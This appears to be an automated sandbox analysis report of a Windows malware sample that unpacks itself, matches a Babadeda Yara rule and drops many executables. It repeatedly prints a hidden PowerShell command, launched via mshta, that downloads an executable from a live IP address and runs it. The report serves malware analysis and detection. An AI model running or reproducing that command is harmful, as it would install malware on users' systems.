Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static file information: File size 3312128 > 1048576

Source: file.exe

Static PE information: Raw size of njmetvfw is bigger than: 0x100000 < 0x2bcc00

Source:	Binary string: e.pdb source: powershell.exe, 0000003B.00000002.2795085782.000001ED7C520000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *n.pdb; source: powershell.exe, 0000003B.00000002.2790182880.000001ED7C1B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdbpdbtem.pdb source: powershell.exe, 00000020.00000002.2548719223.000001EC578A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000020.00000002.2548719223.000001EC578A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Hpdbtem.pdb_ source: powershell.exe, 00000049.00000002.3142154835.000001DBA02AC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\dll\System.Core.pdbN source: powershell.exe, 00000049.00000002.3142154835.000001DBA02AC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbpdbtem.pdb source: powershell.exe, 0000005B.00000002.3236652495.000002072F845000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ows\dll\mscorlib.pdbb source: powershell.exe, 0000003B.00000002.2790182880.000001ED7C1B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: pdbpdblib.pdb source: powershell.exe, 00000049.00000002.3142154835.000001DBA02AC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.pdb source: powershell.exe, 00000069.00000002.3174475979.0000020579ECE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \mscorlib.pdb source: powershell.exe, 00000049.00000002.3142154835.000001DBA02AC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.Core.pdb source: powershell.exe, 00000049.00000002.3142154835.000001DBA02AC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *e.pdbU7MA source: powershell.exe, 0000005B.00000002.3246069714.000002072FA50000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdbDh source: powershell.exe, 00000069.00000002.3239794488.000002057A140000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.f60000.0.unpack :EW;.rsrc:W;.idata :W;njmetvfw:EW;xwzznrso:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;njmetvfw:EW;xwzznrso:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 1.2.skotes.exe.7f0000.0.unpack :EW;.rsrc:W;.idata :W;njmetvfw:EW;xwzznrso:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;njmetvfw:EW;xwzznrso:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.7f0000.0.unpack :EW;.rsrc:W;.idata :W;njmetvfw:EW;xwzznrso:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;njmetvfw:EW;xwzznrso:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Unpacked PE file: 56.2.483d2fa8a0d53818306efeb32d3.exe.80000.0.unpack :EW;.rsrc:W;.idata :W;ububvwau:EW;gjmvneib:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ububvwau:EW;gjmvneib:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Unpacked PE file: 62.2.483d2fa8a0d53818306efeb32d3.exe.80000.0.unpack :EW;.rsrc:W;.idata :W;ububvwau:EW;gjmvneib:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ububvwau:EW;gjmvneib:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Unpacked PE file: 76.2.483d2fa8a0d53818306efeb32d3.exe.80000.0.unpack :EW;.rsrc:W;.idata :W;ububvwau:EW;gjmvneib:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ububvwau:EW;gjmvneib:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Unpacked PE file: 93.2.483d2fa8a0d53818306efeb32d3.exe.80000.0.unpack :EW;.rsrc:W;.idata :W;ububvwau:EW;gjmvneib:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ububvwau:EW;gjmvneib:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Unpacked PE file: 94.2.483d2fa8a0d53818306efeb32d3.exe.80000.0.unpack :EW;.rsrc:W;.idata :W;ububvwau:EW;gjmvneib:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ububvwau:EW;gjmvneib:EW;.taggant:EW;

Yara detected Babadeda

Source: Yara match	File source: 49.2.1759c0aff4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 77.0.1759c0aff4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 77.2.1759c0aff4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.1759c0aff4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.1759c0aff4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 82.0.1759c0aff4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.1759c0aff4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.0.1759c0aff4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.1759c0aff4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 82.2.1759c0aff4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.1759c0aff4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.0.1759c0aff4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe, type: DROPPED

.NET source code contains method to dynamically call methods (often used by packers)

Source: VDoTjfk[1].exe.6.dr, Gq5hSfo2NxEmlo5Bpu.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: VDoTjfk.exe.6.dr, Gq5hSfo2NxEmlo5Bpu.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Suspicious powershell command line found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

Source: VDoTjfk[1].exe.6.dr

Static PE information: 0xFDE635DB [Fri Dec 26 08:18:35 2104 UTC]

Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe

Code function: 7_2_0040ADD6 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,

7_2_0040ADD6

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x25946
Source: ZNWzk16[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x34190
Source: mQvinTe[1].exe.6.dr	Static PE information: real checksum: 0xfb337 should be: 0x1074fb
Source: D95Ju8g.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x167e99
Source: mQvinTe.exe.6.dr	Static PE information: real checksum: 0xfb337 should be: 0x1074fb
Source: 1759c0aff4.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x25946
Source: artVssK.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x750ae
Source: file.exe	Static PE information: real checksum: 0x333230 should be: 0x32d8e3
Source: ZNWzk16.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x34190
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x333230 should be: 0x32d8e3
Source: D95Ju8g[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x167e99
Source: random[1].exe0.6.dr	Static PE information: real checksum: 0x0 should be: 0x8969b

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: njmetvfw
Source: file.exe	Static PE information: section name: xwzznrso
Source: file.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name: njmetvfw
Source: skotes.exe.0.dr	Static PE information: section name: xwzznrso
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.6.dr	Static PE information: section name: .code
Source: 1759c0aff4.exe.6.dr	Static PE information: section name: .code

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7D91C push ecx; ret	0_2_00F7D92F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F71359 push es; ret	0_2_00F7135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_0080D91C push ecx; ret	1_2_0080D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0080D91C push ecx; ret	2_2_0080D92F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 32_2_00007FFD99DD0AFD pushad ; retf	32_2_00007FFD99DD0B02
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Code function: 56_2_0009D91C push ecx; ret	56_2_0009D92F

Source: file.exe	Static PE information: section name: entropy: 7.131215498652649
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.131215498652649
Source: D95Ju8g[1].exe.6.dr	Static PE information: section name: .text entropy: 7.856503548723472
Source: D95Ju8g.exe.6.dr	Static PE information: section name: .text entropy: 7.856503548723472
Source: random[1].exe0.6.dr	Static PE information: section name: .text entropy: 7.010866345977857

Source: VDoTjfk[1].exe.6.dr, Gq5hSfo2NxEmlo5Bpu.cs	High entropy of concatenated method names: 'FyRv9EUDee', 'nW4lBacjpc', 'CTsbJpA4ZL', 'jSAbXGMaP2', 'I0SbRUKCEN', 'ssAbtib8AI', 'IsmbaxBX5H', 'bh1Q2Kaev', 'HGLqt3UNH', 'G8OsJVsYV'
Source: VDoTjfk.exe.6.dr, Gq5hSfo2NxEmlo5Bpu.cs	High entropy of concatenated method names: 'FyRv9EUDee', 'nW4lBacjpc', 'CTsbJpA4ZL', 'jSAbXGMaP2', 'I0SbRUKCEN', 'ssAbtib8AI', 'IsmbaxBX5H', 'bh1Q2Kaev', 'HGLqt3UNH', 'G8OsJVsYV'

Persistence and Installation Behavior

Tries to download and execute files (via powershell)

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1032914001\ZNWzk16.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1032624001\tbd0KQd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Dd7mHw1[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mQvinTe[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\VDoTjfk[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1032884001\D95Ju8g.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1032672001\VDoTjfk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\artVssK[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1033552001\e14357a0aa.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ZNWzk16[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1033551001\9a8f788f0d.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\rsn[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1033224001\mQvinTe.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tbd0KQd[1].exe	Jump to dropped file
